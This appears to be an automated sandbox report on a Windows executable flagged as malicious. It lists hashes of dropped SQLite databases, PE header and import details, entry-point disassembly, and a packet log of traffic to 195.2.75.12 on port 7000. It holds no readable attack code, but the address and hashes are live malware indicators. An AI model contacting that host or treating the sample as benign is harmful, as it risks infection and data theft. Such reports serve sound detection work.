                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\r.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):40960
                  Entropy (8bit):0.8553638852307782
                  Encrypted:false
                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                  MD5:28222628A3465C5F0D4B28F70F97F482
                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\KR6CT3hIxT.exe
                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):3948120
                  Entropy (8bit):7.955285356381258
                  Encrypted:false
                  SSDEEP:98304:6NRBOBfKgQIm9EOTqw8vjh9Ac9nUNupK4hVvcF+yHrAr:sR/gmeOqv7Ac9F0kB
                  MD5:46C17C999744470B689331F41EAB7DF1
                  SHA1:B8A63127DF6A87D333061C622220D6D70ED80F7C
                  SHA-256:C5B5DEF1C8882B702B6B25CBD94461C737BC151366D2D9EBA5006C04886BFC9A
                  SHA-512:4B02A3E85B699F62DF1B4FE752C4DEE08CFABC9B8BB316BC39B854BD5187FC602943A95788EC680C7D3DC2C26AD882E69C0740294BD6CB3B32CDCD165A9441B6
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  • Antivirus: Virustotal, Detection: 0%, Browse
                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u...u...u...v...u...p.P.u.J.....u.J.q...u.J.v...u.J.p...u...q...u...s...u...t...u...t...u.D.|...u.D.u...u.D.....u.D.w...u.Rich..u.........................PE..d...6.@f.........."....!.".....................@.............................@......>.<...`.........................................PO..4....O..P........`...`...?....<..(...0..D...@...T.......................(....M..@............@......,A.......................text...~!.......".................. ..`.rdata... ...@..."...&..............@..@.data........p.......H..............@....pdata...?...`...@...Z..............@..@.didat..8...........................@..._RDATA..\...........................@..@.rsrc....p.......b..................@..@.reloc..D....0......................@..B................................................................................................................................
                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                  Entropy (8bit):7.984223784155051
                  TrID:
                  • Win64 Executable GUI (202006/5) 92.65%
                  • Win64 Executable (generic) (12005/4) 5.51%
                  • Generic Win/DOS Executable (2004/3) 0.92%
                  • DOS Executable Generic (2002/1) 0.92%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:KR6CT3hIxT.exe
                  File size:7'616'416 bytes
                  MD5:5c95d5493dda877b228a6485a6d40d9c
                  SHA1:185482dabc06787f6ce14c6cd46c17372a1b77ae
                  SHA256:fdb5b2a0041b0939552ecd31e382e28529313c8bc8a656eb7de1cef9fbd6eee9
                  SHA512:05334c39be051eb33c0ad4787cd8d56a1386115bf809f2ec44088f719ab5bf3caf8e7a4539cb5d10b60bc5452b98d01656332b7e5c608038aeae73bd88b16e24
                  SSDEEP:196608:0qw9h20Qu0lFIutULgNr8cQ6P/qrFfDG2HD14LDsYu67ReBR:w2FIutULgS7rlDvDSI6cz
                  TLSH:F6763316E7A518F9E1BBE938CD624E02F7B17C5E0370978F1291616A1F6B3D08E39712
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                  Icon Hash:1515d4d4442f2d2d
                  Entrypoint:0x140032ee0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x140000000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:2
                  File Version Major:5
                  File Version Minor:2
                  Subsystem Version Major:5
                  Subsystem Version Minor:2
                  Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                  Instruction
                  dec eax
                  sub esp, 28h
                  call 00007FDD48C5D308h
                  dec eax
                  add esp, 28h
                  jmp 00007FDD48C5CC9Fh
                  int3
                  int3
                  dec eax
                  mov eax, esp
                  dec eax
                  mov dword ptr [eax+08h], ebx
                  dec eax
                  mov dword ptr [eax+10h], ebp
                  dec eax
                  mov dword ptr [eax+18h], esi
                  dec eax
                  mov dword ptr [eax+20h], edi
                  inc ecx
                  push esi
                  dec eax
                  sub esp, 20h
                  dec ebp
                  mov edx, dword ptr [ecx+38h]
                  dec eax
                  mov esi, edx
                  dec ebp
                  mov esi, eax
                  dec eax
                  mov ebp, ecx
                  dec ecx
                  mov edx, ecx
                  dec eax
                  mov ecx, esi
                  dec ecx
                  mov edi, ecx
                  inc ecx
                  mov ebx, dword ptr [edx]
                  dec eax
                  shl ebx, 04h
                  dec ecx
                  add ebx, edx
                  dec esp
                  lea eax, dword ptr [ebx+04h]
                  call 00007FDD48C5C123h
                  mov eax, dword ptr [ebp+04h]
                  and al, 66h
                  neg al
                  mov eax, 00000001h
                  sbb edx, edx
                  neg edx
                  add edx, eax
                  test dword ptr [ebx+04h], edx
                  je 00007FDD48C5CE33h
                  dec esp
                  mov ecx, edi
                  dec ebp
                  mov eax, esi
                  dec eax
                  mov edx, esi
                  dec eax
                  mov ecx, ebp
                  call 00007FDD48C5EE47h
                  dec eax
                  mov ebx, dword ptr [esp+30h]
                  dec eax
                  mov ebp, dword ptr [esp+38h]
                  dec eax
                  mov esi, dword ptr [esp+40h]
                  dec eax
                  mov edi, dword ptr [esp+48h]
                  dec eax
                  add esp, 20h
                  inc ecx
                  pop esi
                  ret
                  int3
                  int3
                  int3
                  dec eax
                  sub esp, 48h
                  dec eax
                  lea ecx, dword ptr [esp+20h]
                  call 00007FDD48C4B6B3h
                  dec eax
                  lea edx, dword ptr [00025747h]
                  dec eax
                  lea ecx, dword ptr [esp+20h]
                  call 00007FDD48C5DF02h
                  int3
                  jmp 00007FDD48C640E4h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  Programming Language:
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xe360.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x970.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0x700000xe3600xe400ada5628b9441c3d4f775b5c1be0267efFalse0.630139802631579data6.596650704309685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x7f0000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  PNG0x706800xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                  PNG0x711c80x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                  RT_ICON0x727780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                  RT_ICON0x72ce00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                  RT_ICON0x735880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                  RT_ICON0x744300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                  RT_ICON0x748980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                  RT_ICON0x759400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                  RT_ICON0x77ee80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                  RT_DIALOG0x7c5b80x286dataEnglishUnited States0.5092879256965944
                  RT_DIALOG0x7c3880x13adataEnglishUnited States0.60828025477707
                  RT_DIALOG0x7c4c80xecdataEnglishUnited States0.6991525423728814
                  RT_DIALOG0x7c2580x12edataEnglishUnited States0.5927152317880795
                  RT_DIALOG0x7bf200x338dataEnglishUnited States0.45145631067961167
                  RT_DIALOG0x7bcc80x252dataEnglishUnited States0.5757575757575758
                  RT_STRING0x7cf980x1e2dataEnglishUnited States0.3900414937759336
                  RT_STRING0x7d1800x1ccdataEnglishUnited States0.4282608695652174
                  RT_STRING0x7d3500x1b8dataEnglishUnited States0.45681818181818185
                  RT_STRING0x7d5080x146dataEnglishUnited States0.5153374233128835
                  RT_STRING0x7d6500x46cdataEnglishUnited States0.3454063604240283
                  RT_STRING0x7dac00x166dataEnglishUnited States0.49162011173184356
                  RT_STRING0x7dc280x152dataEnglishUnited States0.5059171597633136
                  RT_STRING0x7dd800x10adataEnglishUnited States0.49624060150375937
                  RT_STRING0x7de900xbcdataEnglishUnited States0.6329787234042553
                  RT_STRING0x7df500x1c0dataEnglishUnited States0.5178571428571429
                  RT_STRING0x7e1100x250dataEnglishUnited States0.44256756756756754
                  RT_GROUP_ICON0x7bc600x68dataEnglishUnited States0.7019230769230769
                  RT_MANIFEST0x7c8400x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                  DLLImport
                  KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                  gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampSource PortDest PortSource IPDest IP
                  May 26, 2024 01:21:20.055579901 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:20.060955048 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:20.061059952 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:20.182399988 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:20.187380075 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.750159025 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.750458956 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.750530005 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.751024008 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.751614094 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.751631021 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.751683950 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.752816916 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.753415108 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.753433943 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.753485918 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.753487110 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.754565001 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.755531073 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.755660057 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.755718946 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.760694027 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.760869026 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.778717995 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.778943062 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.870124102 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.870372057 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.870537043 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.870980024 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.870995045 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.871069908 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.872159004 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.872174978 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.872313023 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.873393059 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.873408079 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.873423100 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.873481989 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.874552011 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.874567986 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.874707937 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.875742912 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.875765085 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.876086950 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.876956940 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.876971960 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.877012968 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.878129959 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.878145933 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.879283905 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.879298925 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.879312992 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.879322052 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.879357100 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.879390001 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.880188942 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.925121069 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.966722012 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.971451044 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.971764088 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.991662979 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.992011070 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.992558002 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.992561102 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.992573977 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.992647886 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.993746996 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.993762016 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.993906021 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.994961023 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.995527029 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.995817900 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.996124983 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.996140957 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.996155977 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.996335030 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:23.997364998 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.997380972 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:23.997421026 CEST497307000192.168.2.4195.2.75.12
